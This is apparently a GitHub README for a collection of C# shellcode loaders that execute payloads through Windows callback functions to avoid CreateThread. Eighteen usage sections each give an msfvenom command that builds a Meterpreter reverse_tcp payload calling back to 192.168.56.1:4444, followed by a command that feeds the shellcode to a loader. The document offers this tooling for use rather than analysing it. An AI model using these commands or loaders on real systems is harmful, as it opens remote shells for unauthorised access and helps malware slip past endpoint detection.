• Stars: 114
• Rank 308,031 (Top 7 %)
• Language: C#
• Created over 3 years ago
• Updated over 1 year ago

Repository Details

NativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions Technique, without CreateThread Native API)

NativePayload_CBT

NativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions, without CreateThread Native API)

Note: These C# codes were tested with .NET Framework 3.5 or 4.0 only ;) Some of the codes are ready, but I will publish almost all of them from the S4R1N & ChaitanyaHaritash C++ repos soon...

Note: These useful techniques were made by security researcher "@S4R1N"; codes [13,14,15] were made by security researcher "Chaitanya Haritash".

Special Thanks to "S4R1N" for Original C++ Source: https://github.com/S4R1N/AlternativeShellcodeExec

Special Thanks to "Chaitanya Haritash" for Original C++ Source: https://github.com/ChaitanyaHaritash/Callback_Shellcode_Injection

Video: https://www.youtube.com/watch?v=k473K7lWc5Q


My article on calling/invoking C# async code/methods via native callback functions (NativePayload_AsyncM* codes)

Link1: https://damonmohammadbagher.github.io/Posts/29mar2021x.html

Link2: https://www.linkedin.com/pulse/callinvoke-async-c-method-via-callback-function-apis-mohammadbagher/

!    NativePayload_AsyncMethodEUILA.cs  (Async C# Method + EnumUILanguagesA)
!    NativePayload_AsyncMEnumSystemLocalesA.cs  (Async C# Method + EnumSystemLocalesA)
!    NativePayload_AsyncMEnumDisplayMonitors.cs  (Async C# Method + EnumDisplayMonitors)

C# Codes: "New C# codes for Callback Functions will be published here soon..."

+    1. NativePayload_ImageGetDigestStream.cs
+    2. NativePayload_EnumWindows.cs
+    3. NativePayload_EnumWindowStationsW.cs
+    4. NativePayload_EnumResourceTypesW.cs
+    5. NativePayload_EnumChildWindows.cs
+    6. NativePayload_EnumDisplayMonitors.cs
+    7. NativePayload_EnumPageFilesW.cs
+    8. NativePayload_EnumPropsExW.cs
+    9. NativePayload_EnumerateLoadedModules.cs
+    10. NativePayload_CreateThreadPoolWait.cs
+    11. NativePayload_CreateTimerQueueTimer.cs
+    12. NativePayload_SymInitialize.cs
+    13. NativePayload_EnumSystemCodePagesA.cs  (by ChaitanyaHaritash)
+    14. NativePayload_EnumSystemLocalesA.cs  (by ChaitanyaHaritash)
+    15. NativePayload_EnumUILanguagesA.cs  (by ChaitanyaHaritash)
!    16. NativePayload_AsyncMethodEUILA.cs  (Async C# Method + EnumUILanguagesA)
!    17. NativePayload_AsyncMEnumSystemLocalesA.cs  (Async C# Method + EnumSystemLocalesA)
!    18. NativePayload_AsyncMEnumDisplayMonitors.cs  (Async C# Method + EnumDisplayMonitors)

NativePayload_CBT.cs (some of the callback function codes/techniques combined in one code)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_CBT.exe [1,2,3,4,5] [payload...]
Techniques: 1 => ImageGetDigestStream , 2 => EnumWindows , 3 => EnumWindowStationsW , 4 => EnumResourceTypesW , 5 => EnumChildWindows 
example: NativePayload_CBT.exe 3 "fc,48,00,87,00,...."


  1. NativePayload_ImageGetDigestStream.cs (Callback Functions Technique via ImageGetDigestStream Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_ImageGetDigestStream.exe  [payload...]
example: NativePayload_ImageGetDigestStream.exe "fc,48,00,87,00,...."


  2. NativePayload_EnumWindows.cs (Callback Functions Technique via EnumWindows Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumWindows.exe  [payload...]
example: NativePayload_EnumWindows.exe "fc,48,00,87,00,...."


  3. NativePayload_EnumWindowStationsW.cs (Callback Functions Technique via EnumWindowStationsW Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumWindowStationsW.exe  [payload...]
example: NativePayload_EnumWindowStationsW.exe "fc,48,00,87,00,...."


  4. NativePayload_EnumResourceTypesW.cs (Callback Functions Technique via EnumResourceTypesW Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumResourceTypesW.exe  [payload...]
example: NativePayload_EnumResourceTypesW.exe "fc,48,00,87,00,...."


  5. NativePayload_EnumChildWindows.cs (Callback Functions Technique via EnumChildWindows Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumChildWindows.exe  [payload...]
example: NativePayload_EnumChildWindows.exe "fc,48,00,87,00,...."


  6. NativePayload_EnumDisplayMonitors.cs (Callback Functions Technique via EnumDisplayMonitors Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumDisplayMonitors.exe  [payload...]
example: NativePayload_EnumDisplayMonitors.exe "fc,48,00,87,00,...."


  7. NativePayload_EnumPageFilesW.cs (Callback Functions Technique via EnumPageFilesW Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumPageFilesW.exe  [payload...]
example: NativePayload_EnumPageFilesW.exe "fc,48,00,87,00,...."


  8. NativePayload_EnumPropsExW.cs (Callback Functions Technique via EnumPropsExW Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumPropsExW.exe  [payload...]
example: NativePayload_EnumPropsExW.exe "fc,48,00,87,00,...."


  9. NativePayload_EnumerateLoadedModules.cs (Callback Functions Technique via EnumerateLoadedModules/W64 Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumerateLoadedModules.exe  [payload...]
example: NativePayload_EnumerateLoadedModules.exe "fc,48,00,87,00,...."


  10. NativePayload_CreateThreadPoolWait.cs (Callback Functions Technique via CreateThreadPoolWait Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_CreateThreadPoolWait.exe  [payload...]
example: NativePayload_CreateThreadPoolWait.exe "fc,48,00,87,00,...."


  11. NativePayload_CreateTimerQueueTimer.cs (Callback Functions Technique via CreateTimerQueueTimer Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_CreateTimerQueueTimer.exe  [payload...]
example: NativePayload_CreateTimerQueueTimer.exe "fc,48,00,87,00,...."


  12. NativePayload_SymInitialize.cs (Callback Functions Technique via SymInitialize Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_SymInitialize.exe  [payload...]
example: NativePayload_SymInitialize.exe "fc,48,00,87,00,...."


  13. NativePayload_EnumSystemCodePagesA.cs (Callback Functions Technique via EnumSystemCodePagesA Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumSystemCodePagesA.exe  [payload...]
example: NativePayload_EnumSystemCodePagesA.exe "fc,48,00,87,00,...."


  14. NativePayload_EnumSystemLocalesA.cs (Callback Functions Technique via EnumSystemLocalesA Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumSystemLocalesA.exe  [payload...]
example: NativePayload_EnumSystemLocalesA.exe "fc,48,00,87,00,...."


  15. NativePayload_EnumUILanguagesA.cs (Callback Functions Technique via EnumUILanguagesA Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumUILanguagesA.exe  [payload...]
example: NativePayload_EnumUILanguagesA.exe "fc,48,00,87,00,...."


  16. NativePayload_AsyncMethodEUILA.cs (Callback Functions Technique via EnumUILanguagesA API + Async C# Method)

Note: this means native callback API functions can be used to invoke C# code/methods (for example, as an async call).

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_AsyncMethodEUILA.exe  [payload...]
example: NativePayload_AsyncMethodEUILA.exe "fc,48,00,87,00,...."


  17. NativePayload_AsyncMEnumSystemLocalesA.cs (Callback Functions Technique via EnumSystemLocalesA API + Async C# Method)

Note: this means native callback API functions can be used to invoke C# code/methods (for example, as an async call).

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_AsyncMEnumSystemLocalesA.exe  [payload...]
example: NativePayload_AsyncMEnumSystemLocalesA.exe "fc,48,00,87,00,...."


  18. NativePayload_AsyncMEnumDisplayMonitors.cs (Callback Functions Technique via EnumDisplayMonitors API + Async C# Method)

Note: this means native callback API functions can be used to invoke C# code/methods (for example, as an async call).

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_AsyncMEnumDisplayMonitors.exe  [payload...]
example: NativePayload_AsyncMEnumDisplayMonitors.exe "fc,48,00,87,00,...."

